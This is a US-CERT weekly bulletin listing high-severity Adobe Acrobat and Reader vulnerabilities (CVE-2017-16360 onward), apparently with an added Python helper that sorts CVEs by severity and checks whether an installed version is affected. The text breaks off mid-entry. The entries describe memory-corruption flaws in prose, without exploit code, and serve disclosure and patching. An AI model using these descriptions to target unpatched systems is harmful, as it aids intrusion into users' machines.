SB17-352: Vulnerability Summary for the Week of December 11, 2017

Original release date: December 18, 2017

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities corresponds to the following scores:

  • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

  • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

  • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.
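As an added example (not part of the bulletin, and not US-CERT or NVD code): a small Python triage helper that applies the three bands above to a set of records, pulls the "X.Y.Z and earlier versions" ceilings out of an NVD description such as the Adobe Acrobat and Reader entries that follow, and decides whether an installed build falls under them. The record layout, the sample records, and the rule that builds sharing every component except the last belong to the same release line are assumptions of the example, not statements from the bulletin.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# The bulletin's own severity bands (CVSS base score, one decimal place).
BANDS = (("High", 7.0, 10.0), ("Medium", 4.0, 6.9), ("Low", 0.0, 3.9))


def severity(score: float) -> str:
    """Map a CVSS base score to the bulletin's High / Medium / Low label.

    Scores outside 0.0-10.0, or with more than one decimal (e.g. 6.95), fall
    into no band and are rejected rather than silently rounded into one.
    """
    for label, lo, hi in BANDS:
        if lo <= score <= hi:
            return label
    raise ValueError(f"not a valid one-decimal CVSS base score: {score!r}")


# "2017.012.20098 and earlier versions" -> one ceiling per release line.
CEILING_RE = re.compile(r"(\d+(?:\.\d+)+) and earlier versions")
Version = Tuple[int, ...]


def parse_version(text: str) -> Version:
    """'2017.012.20098' -> (2017, 12, 20098); leading zeros are not significant."""
    return tuple(int(part) for part in text.strip().split("."))


def affected_ceilings(description: str) -> List[Version]:
    """Pull every 'X.Y.Z and earlier versions' ceiling out of an NVD description."""
    return [parse_version(v) for v in CEILING_RE.findall(description)]


def is_affected(installed: str, ceilings: List[Version]) -> Optional[bool]:
    """Decide whether an installed build falls under one of the ceilings.

    Assumption (not stated by the bulletin): builds that share every component
    except the last belong to the same release line, so only the last component
    is compared, and only against that line's ceiling. Comparing whole tuples
    would wrongly mark 2017.011.30067 (a later build on its own line) as
    'earlier than' 2017.012.20098. A build on a line the description does not
    mention yields None: the text says nothing about it either way.
    """
    inst = parse_version(installed)
    for ceiling in ceilings:
        if len(inst) == len(ceiling) and inst[:-1] == ceiling[:-1]:
            return inst[-1] <= ceiling[-1]
    return None


def triage(records: List[Dict], installed: Optional[str] = None) -> Dict[str, List[Dict]]:
    """Bucket records by band (highest score first); optionally flag hits on `installed`."""
    buckets: Dict[str, List[Dict]] = defaultdict(list)
    for rec in records:
        entry = dict(rec, severity=severity(rec["cvss"]))
        if installed is not None:
            entry["affected"] = is_affected(installed, affected_ceilings(rec["description"]))
        buckets[entry["severity"]].append(entry)
    for items in buckets.values():
        items.sort(key=lambda r: -r["cvss"])
    return dict(buckets)


# Constructed sample records: the first is copied from the bulletin's Adobe
# entries; the second is a made-up low-severity record with no version clause.
SAMPLE_RECORDS = [
    {"id": "CVE-2017-16360", "cvss": 9.3,
     "description": "An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 "
                    "and earlier versions, 2017.011.30066 and earlier versions, "
                    "2015.006.30355 and earlier versions, and 11.0.22 and earlier versions."},
    {"id": "sample-low (constructed)", "cvss": 2.1,
     "description": "Constructed low-severity record with no version clause."},
]

if __name__ == "__main__":
    for band, items in triage(SAMPLE_RECORDS, installed="2017.011.30066").items():
        for item in items:
            print(band, item["id"], item["cvss"], "affected:", item.get("affected"))
```

Run it with an installed build on any of the four lines: a build on the 2017.011 line at or below 30066 is flagged, one build higher is not, and a build on a line the text never mentions comes back as None so it can be reviewed by hand instead of being silently cleared.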


High Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the MakeAccessible plugin, when creating an internal data structure. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16360 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of an out of bounds read vulnerability in the MakeAccessible plugin, when handling font data. It causes an out of bounds memory access, which sometimes triggers an access violation exception. Attackers can exploit the vulnerability by using the out of bounds access for unintended reads, writes, or frees, potentially leading to code corruption, control-flow hijack, or an information leak attack.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16362 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the module that handles character codes for certain textual representations. Invalid input leads to a computation where the pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16363 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference when handling number format dictionary entries. In this scenario, the input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16364 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the True Type2 Font parsing module. A corrupted cmap table input leads to a computation where the pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16365 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a type confusion overflow vulnerability. The vulnerability leads to an out of bounds memory access. Attackers can exploit the vulnerability by using the out of bounds access for unintended reads or writes -- potentially leading to code corruption, control-flow hijack, or an information leak attack.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16367 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability leads to a stack-based buffer overflow condition in the internal Unicode string manipulation module. It is triggered by an invalid PDF file, where a crafted Unicode string causes an out of bounds memory access of a stack allocated buffer, due to improper checks when manipulating an offset of a pointer to the buffer. Attackers can exploit the vulnerability and achieve arbitrary code execution if they can effectively control the accessible memory.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16368 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs because of a computation that reads data that is past the end of the target buffer; the computation is a part of the JavaScript engine. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16370 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the JavaScript engine. In this scenario, the input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16371 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the JavaScript API engine. In this scenario, the JavaScript input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16372 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference. In this scenario, the input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16373 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the JPEG 2000 module. An invalid JPEG 2000 input code stream leads to a computation where the pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16374 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the JavaScript API engine. In this scenario, the JavaScript input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16375 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the MakeAccessible plugin. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16376 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is due to a computation that accesses a pointer that has not been initialized in the main DLL. In this case, a computation defines a read from an unexpected memory location. Therefore, an attacker might be able to read sensitive portions of memory.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16377 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is due to a computation that accesses a pointer that has not been initialized; the computation occurs during internal AST thread manipulation. In this case, a computation defines a read from an unexpected memory location. Therefore, an attacker might be able to read sensitive portions of memory.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16378 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a type confusion overflow vulnerability in the graphics rendering engine.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16379 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a security bypass vulnerability for a certain file-type extension. Acrobat maintains both a blacklist and whitelist (the user can specify an allowed attachment). However, any file extensions that are neither on the blacklist nor the whitelist can still be opened after displaying a warning prompt.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16380 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value when processing TIFF files embedded within an XPS document. Crafted TIFF image input causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16381 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the image conversion module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16382 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a heap overflow vulnerability when processing a JPEG file embedded within an XPS document.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16383 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the exif processing module for a PNG file (during XPS conversion). Invalid input leads to a computation where pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16384 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in TIFF parsing during XPS conversion. Crafted TIFF image input causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16385 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the XPS2PDF conversion engine. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16386 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the JPEG2000 codec. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16387 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript API engine. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16388 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine. The mismatch between an old and a new object can provide an attacker with unintended memory access. Successful exploitation could lead to arbitrary code execution.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16389 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine API. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16390 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is a result of untrusted input that is used to calculate an array index; the calculation occurs in the printing functionality. The vulnerability leads to an operation that can write to a memory location that is outside of the memory addresses allocated for the data structure. The specific scenario leads to a write access to a memory location that does not belong to the relevant process address space.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16391 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in the JPEG processing module. Crafted input with an unexpected JPEG file segment size causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16392 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16393 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the WebCapture module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16394 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in the image conversion module when processing Enhanced Metafile Format (EMF). Crafted EMF input (EMR_STRETCHDIBITS) causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16395 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in the TIFF processing module. Crafted input causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16396 | BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of Enhanced Metafile Format (EMF) processing within the image conversion module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16397 | BID, SECTRACK, CONFIRM

adobe -- acrobat
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16398 | BID, SECTRACK, CONFIRM

adobe -- acrobat
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the XPS parsing module. In this scenario, the input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16399 | BID, SECTRACK, CONFIRM

adobe -- acrobat
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the JPEG 2000 parser. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16400 | BID, SECTRACK, CONFIRM

adobe -- acrobat
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of an image conversion, specifically in Enhanced Metafile Format Plus (EMF+) processing modules. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16401 | BID, SECTRACK, CONFIRM

adobe -- acrobat
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the JPEG 2000 module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16402 | BID, SECTRACK, CONFIRM

adobe -- acrobat
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the image conversion module that processes Enhanced Metafile Format Plus (EMF+) data. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16403 | BID, SECTRACK, CONFIRM

adobe -- acrobat
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of processing Enhanced Metafile Format Plus (EMF+). The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16404 | BID, SECTRACK, CONFIRM

adobe -- acrobat
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of Acrobat's page display functionality. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16405 | BID, SECTRACK, CONFIRM

adobe -- acrobat
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a type confusion vulnerability in the EMF processing module. The issue causes the program to access an object using an incompatible type, leading to an out of bounds memory access. Attackers can exploit the vulnerability by using the out of bounds access for unintended reads, writes, or frees -- potentially leading to code corruption, control-flow hijack, or an information leak attack.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16406 | BID, SECTRACK, CONFIRM

adobe -- acrobat
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of handling an EMF EMR_BITBLT record. The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16407 | BID, SECTRACK, CONFIRM

adobe -- acrobat
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the WebCapture module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16408 | BID, SECTRACK, CONFIRM

adobe -- acrobat
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the Adobe graphics module responsible for displaying textual data. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16409 | BID, SECTRACK, CONFIRM

adobe -- acrobat
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is a result of untrusted input that is used to calculate an array index; the calculation occurs in the image conversion module, when processing GIF files. The vulnerability leads to an operation that can write to a memory location that is outside of the memory addresses allocated for the data structure. The specific scenario leads to a write access to a memory location that does not belong to the relevant process address space.
  Published: 2017-12-09 | CVSS Score: 9.3 | CVE-2017-16410 | BID, SECTRACK, CONFIRM

adobe -- acrobat
  An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the WebCapture module, related to an internal hash table implementation. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
